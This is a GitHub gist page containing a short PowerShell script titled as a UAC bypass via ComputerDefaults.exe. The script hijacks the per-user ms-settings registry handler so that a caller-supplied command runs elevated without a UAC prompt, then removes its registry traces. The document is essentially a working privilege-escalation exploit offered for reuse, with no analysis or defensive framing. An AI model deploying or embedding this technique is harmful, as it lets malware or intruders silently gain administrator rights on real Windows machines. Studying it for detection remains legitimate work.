Skip to content

Instantly share code, notes, and snippets.

@natesubra
Created October 11, 2021 23:52
Show Gist options
  • Save natesubra/8b1cc45844e6469dc6b10f9a169d7271 to your computer and use it in GitHub Desktop.
Save natesubra/8b1cc45844e6469dc6b10f9a169d7271 to your computer and use it in GitHub Desktop.
ComputerDefaults.exe UAC Bypass Snippet
param (
[Parameter(Mandatory = $True)]
[ScriptBlock]$ScriptBlock
)
if ([System.Security.Principal.WindowsIdentity]::GetCurrent().Groups.Value -match 'S-1-5-32-544') {
Write-Host 'Already Elevated'
} else {
$RegPath = 'HKCU:\software\classes\ms-settings\shell\open\command'
New-Item $RegPath -Force
New-ItemProperty $RegPath -Name 'DelegateExecute' -Value $null -Force
Set-ItemProperty $RegPath -Name '(default)' -Force -Value "pwsh.exe -NoExit -NoLogo -NoProfile -ExecutionPolicy RemoteSigned -Command $ScriptBlock"
Start-Process -Wait 'ComputerDefaults.exe'
Remove-Item $RegPath -Force -Recurse
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment